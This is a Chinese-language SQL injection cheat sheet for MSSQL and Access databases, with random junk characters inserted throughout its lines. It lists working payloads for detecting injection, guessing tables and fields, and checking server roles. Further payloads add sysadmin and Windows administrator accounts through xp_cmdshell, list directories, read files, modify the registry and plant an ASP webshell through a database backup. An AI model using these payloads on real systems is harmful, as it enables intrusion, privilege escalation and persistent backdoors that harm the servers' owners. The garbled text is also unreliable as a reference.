1.判断是否有注入;and 1=1 ;and 1=2 S_6g~PHsr
2.初步判断是否是mssql ;and user>0 >z(wf>2J
yNBv-oe5
3.注入参数是字符'and [查询条件] and ''=' <:">mV+/
e!GZSk
4.搜索时没过滤参数的'and [查询条件] and '%25'=' YxXqI
9UV9h_.x
5.判断数据库系统 HmMO*k<6@
! D$Ooamq
;and (select count(*) from sysobjects)>0 mssql "tUwo(K[
`{[RjM`
;and (select count(*) from msysobjects)>0 access UbO4%YHt
5Tedo~v
=_l)gx+Y+y
X3<K 1/<
6.猜数据库 ;and (select Count(*) from [数据库名])>0 P;73Hr[E#
h$>wv`
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 PQ$sOK|/
J/ vK6cO\
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 nq1
'F
eNbpwne
9.(1)猜字段的ascii值(access) 2VA!&`I
[KSH~:h:NR
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sef]>q
/N6}*0Ru
(2)猜字段的ascii值(mssql) J? .F\`N)
BgM%+b8u
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ##cnFQCB
&dr@6-xaq
10.测试权限结构(mssql) i)MEK#{
FH8k'Hxg
{WQq}-(
y \D=Z
N@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <.bRf
1Ipfw
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Xh
F_]
D<>@
%"%
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- XRxj W
`:p1&OS
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- KnGTcoXg_
tlQC6Fb#
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ?2 f_aY ;
'1Y\[T*
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- U\zD,<I9
o:~LF6A-
;and 1=(select IS_MEMBER('db_owner'));-- bWmw3w
j/KO|iNL2
po7>IQS]
* ?]~
#
11.添加mssql和系统的帐户 PX2c[CDE^
s2REt$.q
;exec master.dbo.sp_addlogin username;-- Jxa4hM0
;exec master.dbo.sp_password null,username,password;-- Yf}xwpuLk
g9~]s9
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- pDl3!m
@kxel`,$e
;exec master.dbo.xp_cmdshell 'net user username password IeP
WOpj3
TB!(('
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- *2e!M^K<
}r%X`i|
;exec master.dbo.xp_cmdshell 'net user username password /add';-- QI_4*
) #+^
sAO
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ]PR#W_&q
vUesV%9hq
_las;S'oa
~b)74M/
12.(1)遍历目录 Zsx3/}
$n!K6fkX%
;create table dirs(paths varchar(100), id int) =a}b+(R
G8J*Wnwu[K
;insert dirs exec master.dbo.xp_dirtree 'c:\' [0y$! f4
{<=#*qx[Y!
;and (select top 1 paths from dirs)>0 />44]A<
,|h)bg7.
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) (Un_!)
,r8Tbk]m
F(,UA+$A
Iz@)!3h
(2)遍历目录 ;j%BK(5
yN6>VD{F
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Vzl^Ka'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 !.TLW
:O= \<t
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 wW>fVPr
1:M@&1LYp
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 2%u;$pj
g(|{')8?d
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 T~4N+fK
Qk1xUE
OLC{iD#
&ldBv_
13.mssql中的存储过程 t2BL(yB
,|kDsR!
xp_regenumvalues 注册表根键, 子键 jE\Sm2G9
om h{0jA0
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 7U|mu~$.!
0#cy=*E
xp_regread 根键,子键,键值名 ,yd= e}lQx
_zWfI.o
;exec xp_regread qIMA6u/
De&6 9
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 O1'm@
q)
2lVHZ\G
xp_regwrite 根键,子键, 值名, 值类型, 值 "Wo,'8{v
JW.=T)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 9f+>ix,ek*
RsJ6OFcWV
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'T<iHV&
$%R$G`.KM
xp_regdeletevalue 根键,子键,值名 &<RpWA k{
~m^ #FJu
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Xx:F)A8O
Uyx!E4pl(
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ~@.%m"<.
3&&9_`r&_
jhbonuV_
)lk&z8;.=
14.mssql的backup创建webshell e[_m<e
qMt++*Ls
use model rgmF: C
c(;a=n(E#
create table cmd(str image); 3jB$2: #
YuZ"s55zU{
insert into cmd(str) values (''); 3psU?8(
Z_1U9+,
backup database model to disk='c:\l.asp'; 7\FXz'hA
V-'K6mn;
fjk\L\1
W6 H,6v
15.mssql内置函数 l<0}l^C.
`K~AhlJUQ
;and (select @@version)>0 获得Windows的版本号 2_vbT!_
B33$pUk
;and user_name()='dbo' 判断当前系统的连接用户是不是sa h\v'9
,1OyN]f3
;and (select user_name())>0 爆当前系统的连接用户 c:Wze*vI;
om?-WJI
;and (select db_name())>0 得到当前连接的数据库 HK|ynBAo
$`R6=\|
<1%f@}+8
PxH72hBS
16.简洁的webshell D?XM,l+
tyaA\F57
use model FFdBtB
b4^`DHRu6
create table cmd(str image); 0cK{
E|'h]NY
insert into cmd(str) values (''); m3Il3ZY.
@2'Mt}R>
backup database model to disk='g:\wwwtest\l.asp';